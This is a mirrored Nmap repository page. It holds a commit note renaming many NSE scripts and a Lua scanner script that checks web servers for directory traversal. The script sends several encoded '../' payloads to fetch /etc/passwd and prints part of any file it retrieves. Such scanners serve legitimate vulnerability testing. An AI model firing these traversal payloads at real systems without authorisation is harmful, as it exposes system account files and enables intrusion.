mirror of
https://github.com/nmap/nmap.git
synced 2025-12-14 19:59:02 +00:00
make them look better in output. The full list of changes is anonFTP => ftp-anon ASN => asn-query brutePOP3 => pop3-brute bruteTelnet => telnet-brute daytimeTest => daytime dns-safe-recursion-port => dns-random-srcport dns-safe-recursion-txid => dns-random-txid dns-test-open-recursion => dns-recursion ftpbounce => ftp-bounce HTTPAuth => http-auth HTTP_open_proxy => http-open-proxy HTTPpasswd => http-passwd HTTPtrace => http-trace iax2Detect => iax2-version ircServerInfo => irc-info ircZombieTest => irc-zombie MSSQLm => ms-sql-info MySQLinfo => mysql-info popcapa => pop3-capabilities PPTPversion => pptp-version promiscuous => sniffer-detect RealVNC_auth_bypass => realvnc-auth-bypass robots => robots.txt showHTMLTitle => html-title showOwner => identd-owners skype_v2-version => skypev2-version smb-enumdomains => smb-enum-domains smb-enumsessions => smb-enum-sessions smb-enumshares => smb-enum-shares smb-enumusers => smb-enum-users smb-serverstats => smb-server-stats smb-systeminfo => smb-system-info SMTPcommands => smtp-commands SMTP_openrelay_test => smtp-open-relay SNMPcommunitybrute => snmp-brute SNMPsysdescr => snmp-sysdescr SQLInject => sql-injection SSH-hostkey => ssh-hostkey SSHv1-support => sshv1 SSLv2-support => sslv2 strangeSMTPport => smtp-strangeport UPnP-info => upnp-info xamppDefaultPass => xampp-default-auth zoneTrans => zone-transfer
98 lines
2.4 KiB
Lua
98 lines
2.4 KiB
Lua
description = [[
|
|
Checks if a web server is vulnerable to directory traversal by attempting to
|
|
retrieve /etc/passwd.
|
|
]]
|
|
|
|
-- 07/20/2007:
|
|
-- * Used Thomas Buchanan's HTTPAuth script as a starting point
|
|
-- * Applied some great suggestions from Brandon Enright, thanks a lot man!
|
|
--
|
|
-- 01/31/2008:
|
|
-- * Rewritten to use Sven Klemm's excellent HTTP library and to do some much
|
|
-- needed cleaning up
|
|
|
|
author = "Kris Katterjohn <katterjohn@gmail.com>"
|
|
|
|
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
|
|
|
|
categories = {"intrusive", "vuln"}
|
|
|
|
require "shortport"
|
|
require "http"
|
|
|
|
--- Validates the HTTP response code and checks for a <code>valid</code> passwd
|
|
-- format in the body.
|
|
--@param response The HTTP response from the server.
|
|
--@return The body of the HTTP response.
|
|
local validate = function(response)
|
|
if not response.status then
|
|
return nil
|
|
end
|
|
|
|
if response.status ~= 200 then
|
|
return nil
|
|
end
|
|
|
|
if not response.body:match("^[^:]+:[^:]*:[0-9]+:[0-9]+:") then
|
|
return nil
|
|
end
|
|
|
|
return response.body
|
|
end
|
|
|
|
--- Transforms a string with ".", "/" and "\" converted to their URL-formatted
|
|
--- hex equivalents
|
|
--@param str String to hexify.
|
|
--@return Transformed string.
|
|
local hexify = function(str)
|
|
local ret
|
|
ret = str:gsub("%.", "%%2E")
|
|
ret = ret:gsub("/", "%%2F")
|
|
ret = ret:gsub("\\", "%%5C")
|
|
return ret
|
|
end
|
|
|
|
--- Truncates the <code>passwd</code> file.
|
|
--@param passwd <code>passwd</code> file.
|
|
--@return Truncated passwd file and truncated length.
|
|
local truncatePasswd = function(passwd)
|
|
local len = 250
|
|
return passwd:sub(1, len), len
|
|
end
|
|
|
|
--- Formats output.
|
|
--@param passwd <code>passwd</code> file.
|
|
--@param dir Formatted request which elicited the good reponse.
|
|
--@return String description for output
|
|
local output = function(passwd, dir)
|
|
local trunc, len = truncatePasswd(passwd)
|
|
local out = ""
|
|
out = out .. "Found with \"" .. dir .. "\"\n"
|
|
out = out .. "Printing first " .. len .. " bytes:\n"
|
|
out = out .. trunc
|
|
return out
|
|
end
|
|
|
|
portrule = shortport.port_or_service({80, 443, 8080}, {"http", "https"})
|
|
|
|
action = function(host, port)
|
|
local dirs = {
|
|
"//etc/passwd",
|
|
string.rep("../", 10) .. "etc/passwd",
|
|
"." .. string.rep("../", 10) .. "etc/passwd",
|
|
string.rep("..\\/", 10) .. "etc\\/passwd",
|
|
string.rep("..\\", 10) .. "etc\\passwd"
|
|
}
|
|
|
|
for _, dir in ipairs(dirs) do
|
|
local response = http.get(host, port, hexify(dir))
|
|
|
|
if validate(response) then
|
|
return output(response.body, dir)
|
|
end
|
|
end
|
|
|
|
return
|
|
end
|
|
|